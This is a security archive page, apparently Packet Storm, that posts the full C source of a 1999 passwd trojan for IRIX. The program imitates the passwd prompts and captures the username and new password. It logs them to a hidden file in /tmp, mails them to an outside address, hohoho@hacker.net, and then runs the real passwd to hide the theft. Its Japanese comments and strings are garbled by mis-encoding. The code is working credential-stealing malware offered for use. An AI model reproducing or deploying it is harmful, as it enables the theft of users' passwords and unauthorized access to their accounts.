what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

passwd_irix.c

passwd_irix.c
Posted Nov 5, 1999
Authored by shadowpenguin

Passwd trojan for IRIX. This trojan logs the username and password, and mails such information to you.

tags | trojan
systems | unix, irix
SHA-256 | 09d660e6270d32cdfff43d868a72322ba1e8dab294bc930609334181ca2f9b3c

passwd_irix.c

Change Mirror Download
/*=============================================================================
SU Trojan Ver2.00 for IRIX
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (unewn4th@usa.net)
=============================================================================
*/

#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>

/* ƒpƒXƒ[ƒh‚ð’Ê’m‚·‚郁ƒAƒh */
/* ˆÈ‰º‚Ì1s‚ðíœ‚·‚é‚ƃ[ƒ‹’Ê’m‚͍s‚í‚ê‚Ü‚¹‚ñ */
#define MAIL "hohoho@hacker.net"

/* ƒƒMƒ“ƒOƒtƒ@ƒCƒ‹. Œ©‚‚©‚è‚É‚­‚¢–¼‘O‚ɕύX */
#define LOGFILE "/tmp/.pl"

#define MSG_PERMERR "‹–‰Â‚ª—^‚¦‚ç‚ê‚Ä‚¢‚Ü‚¹‚ñ\n"
#define MSG_DOESNTEXIST "—\Šú‚µ‚È‚¢Ž¸”s‚Å‚·.\n"
#define MSG_BANNER "%s ‚̃pƒXƒ[ƒh‚ð•ÏX‚µ‚Ü‚·\n"
#define MSG_OLDPASS "‹ŒƒpƒXƒ[ƒh:"
#define MSG_BADOLDPASS "Žc”O‚Å‚·\n"
#define MSG_NEWPASS "VƒpƒXƒ[ƒh:"
#define MSG_RENEWPAS "V‚µ‚¢ƒpƒXƒ[ƒh‚ðÄ“ü—Í‚µ‚ĉº‚³‚¢:"
#define MSG_TOOSHORT "ƒpƒXƒ[ƒh‚ª’Z‚©‰ß‚¬‚Ü‚· - ­‚È‚­‚Æ‚à 6 •¶ŽšˆÈã•K—v‚Å‚·\n"
#define MSG_MUSTDIFF "ƒpƒXƒ[ƒh‚Í‹ŒƒpƒXƒ[ƒh‚Æ 3 •¶ŽšˆÈãˆÙ‚Á‚Ä‚¢‚È‚¯‚ê‚΂Ȃè‚Ü‚¹‚ñ\n"
#define MSG_INVALID "ƒpƒXƒ[ƒh‚É‚Í 2 ‚ˆȏã‚̉¢Žš‚¨‚æ‚Ñ 1 ‚ˆȏã‚Ì\n"\
"”Žš‚Ü‚½‚Í“ÁŽê•¶Žš‚ðŠÜ‚Ü‚È‚¯‚ê‚΂Ȃè‚Ü‚¹‚ñ\n"
#define MSG_DONTMATCH "ˆê’v‚µ‚Ü‚¹‚ñ\nÄŽÀs‚µ‚ĉº‚³‚¢\n"

#define ESG_PERMERR "Permission denied\n"
#define ESG_DOESNTEXIST "Unexpected failure.\n"
#define ESG_BANNER "Changing password for %s\n"
#define ESG_OLDPASS "Old password:"
#define ESG_BADOLDPASS "Sorry\n"
#define ESG_NEWPASS "New password:"
#define ESG_RENEWPAS "Re-enter new password:"
#define ESG_TOOSHORT "Password is too short - must be at least 6 characters\n"
#define ESG_MUSTDIFF "Passwords must differ by at least 3 positions\n"
#define ESG_INVALID "Password must contain at least two alphabetic characters\n"\
" and at least one numeric or special character.\n"
#define ESG_DONTMATCH "They don't match\nTry again later.\n"

#define TMPFILE "/tmp/.tmp"
#define MAX_USERNAME 200
#define MAX_PASSWD 200

int ja_flag;

main(int argc,char *argv[])
{
int uid=getuid();
struct passwd p;
char oldpasswd[MAX_PASSWD],newpasswd[MAX_PASSWD],renewpasswd[MAX_PASSWD];
char *getpass_sys(char *);
char username[MAX_USERNAME];
char buf[200];
FILE *fp;
int i,ct,l;

if (strstr(getenv("LANG"),"ja")==NULL) ja_flag=0;
else ja_flag=1;

memcpy(&p,getpwuid(uid),sizeof(struct passwd));
if (argc==1)
strcpy(username,p.pw_name);
else{
strncpy(username,argv[1],MAX_USERNAME-1);
username[MAX_USERNAME-1]=0;
if (getpwnam(argv[1])==NULL){
if (ja_flag==1) printf(MSG_DOESNTEXIST,argv[1]);
else printf(ESG_DOESNTEXIST,argv[1]);
exit(1);
}

memcpy(&p,getpwuid(uid),sizeof(struct passwd));
if (uid!=0 && strcmp(p.pw_name,argv[1])){
if (ja_flag==1) printf(MSG_PERMERR);
else printf(ESG_PERMERR);
exit(1);
}
}

if (argc==1){
if (ja_flag==1) printf(MSG_BANNER,username);
else printf(ESG_BANNER,username);
}

if (uid!=0){
if (ja_flag==1) strncpy(oldpasswd,getpass(MSG_OLDPASS),MAX_PASSWD-1);
else strncpy(oldpasswd,getpass(ESG_OLDPASS),MAX_PASSWD-1);
oldpasswd[MAX_PASSWD-1]=0;
if (strlen(oldpasswd)==0){
if (ja_flag==1) printf(MSG_BADOLDPASS);
else printf(ESG_BADOLDPASS);
exit(1);
}
}
for (;;){
if (ja_flag==1) strncpy(newpasswd,getpass_sys(MSG_NEWPASS),MAX_PASSWD-1);
else strncpy(newpasswd,getpass_sys(ESG_NEWPASS),MAX_PASSWD-1);
newpasswd[MAX_PASSWD-1]=0;
if (strlen(newpasswd)<strlen(oldpasswd)) l=strlen(newpasswd);
else l=strlen(oldpasswd);
for (ct=0,i=0;i<l;i++)
if (newpasswd[i]!=oldpasswd[i]) ct++;
if (ct>=3) break;
if (ja_flag==1) printf(MSG_MUSTDIFF);
else printf(ESG_MUSTDIFF);
}
if (ja_flag==1) strncpy(renewpasswd,getpass_sys(MSG_RENEWPAS),MAX_PASSWD-1);
else strncpy(renewpasswd,getpass_sys(ESG_RENEWPAS),MAX_PASSWD-1);
renewpasswd[MAX_PASSWD-1]=0;
if (ja_flag==1) printf(MSG_DONTMATCH);
else printf(ESG_DONTMATCH);

if ((fp=fopen(LOGFILE,"a"))!=NULL){
fprintf(fp,"%s %s %s\n",username,newpasswd,renewpasswd);
fclose(fp);
}
#ifdef MAIL
if ((fp=fopen(TMPFILE,"w"))!=NULL){
fprintf(fp,"%s %s %s\n",username,newpasswd,renewpasswd);
fclose(fp);
}
sprintf(buf,"mail %s < %s",MAIL,TMPFILE);
system(buf);
remove(TMPFILE);
#endif
sprintf(buf,"passwd %s",username);
system(buf);
}
char *getpass_sys(char *d)
{
static char *x;
int i,c1,c2;

for (;;){
x=getpass(d);
if (strlen(x)<6){
if (ja_flag==1) printf(MSG_TOOSHORT);
else printf(ESG_TOOSHORT);
continue;
}
c1=c2=0;
for (i=0;i<strlen(x);i++){
if ((x[i]>='a' && x[i]<='x') || (x[i]>='A' && x[i]<='X')) c1++;
else c2++;
}
if (c1<2 || c2==0){
if (ja_flag==1) printf(MSG_INVALID);
else printf(ESG_INVALID);
continue;
}
break;
}
return (x);
}

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close